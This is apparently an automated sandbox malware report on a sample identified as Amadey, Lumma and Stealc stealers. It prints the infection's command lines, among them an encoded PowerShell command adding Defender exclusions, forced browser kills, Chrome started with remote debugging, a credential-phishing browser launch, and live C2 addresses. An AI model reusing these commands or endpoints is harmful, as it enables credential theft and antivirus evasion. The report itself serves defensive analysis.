Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1547313
MD5:1e33e63c356ac4032505c4a3f7157786
SHA1:d269e43d5e8439e0a033b3291963b478308f5934
SHA256:dc143828ace64c6a5de6fd23b99b0b5c73c49f3b1a2a1a585ec356ecd57eaf13
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops VBS files to the startup folder
Drops large PE files
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1E33E63C356AC4032505C4A3F7157786)
    • skotes.exe (PID: 4192 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 1E33E63C356AC4032505C4A3F7157786)
  • skotes.exe (PID: 3220 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 1E33E63C356AC4032505C4A3F7157786)
  • skotes.exe (PID: 5844 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 1E33E63C356AC4032505C4A3F7157786)
    • Fwkdsz.exe (PID: 1748 cmdline: "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" MD5: 54F4EBCE5C56BF86C5948D89BA8C875F)
      • powershell.exe (PID: 1720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 1308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • MSBuild.exe (PID: 5856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 1228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 24da741fb6.exe (PID: 1236 cmdline: "C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe" MD5: 53014E825FFABBC0AC8A0AB1AEC76EE7)
      • 33QCBA038D3K2VF7AVBGWF5K.exe (PID: 8016 cmdline: "C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe" MD5: 01DDF9CC770BC558B2FAFFA43B9B5B12)
    • 0d8313073f.exe (PID: 4136 cmdline: "C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe" MD5: 90CD56BFD041977B953EC0D6AC7F665C)
      • chrome.exe (PID: 6368 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2252,i,12247254292580222694,14534572486204827192,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 203f60e481.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe" MD5: C1FA8AC639C1D531A4C7CF311C056AB0)
      • taskkill.exe (PID: 5848 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 2908 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5416 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6280 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6404 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 6868 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 8a0ff7e068.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe" MD5: 01DDF9CC770BC558B2FAFFA43B9B5B12)
  • wscript.exe (PID: 3812 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • firefox.exe (PID: 6844 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 6864 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6128 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e41cdf-9cd7-4e6b-84b6-f40482f74e4a} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253dc76dd10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6564 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4036 -parentBuildID 20230927232528 -prefsHandle 4400 -prefMapHandle 3816 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {67daa889-b47a-41d1-9d91-f60d147d808b} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253ee211110 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 2044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
{"C2 url": ["founpiuer.store", "navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1734062990.00000000004B1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000002.00000003.1695582240.0000000005080000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000007.00000002.2705352741.0000000006C60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Click to see the 20 entries
                SourceRuleDescriptionAuthorStrings
                7.2.Fwkdsz.exe.6c60000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  7.2.Fwkdsz.exe.4568190.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    6.2.skotes.exe.4b0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      1.2.skotes.exe.4b0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        2.2.skotes.exe.4b0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 2 entries

                          System Summary

                          barindex
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5844, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24da741fb6.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe, ParentProcessId: 1748, ParentProcessName: Fwkdsz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBN
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , ProcessId: 3812, ProcessName: wscript.exe
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe, ParentProcessId: 4136, ParentProcessName: 0d8313073f.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 6368, ProcessName: chrome.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5844, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24da741fb6.exe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe, ParentProcessId: 1748, ParentProcessName: Fwkdsz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 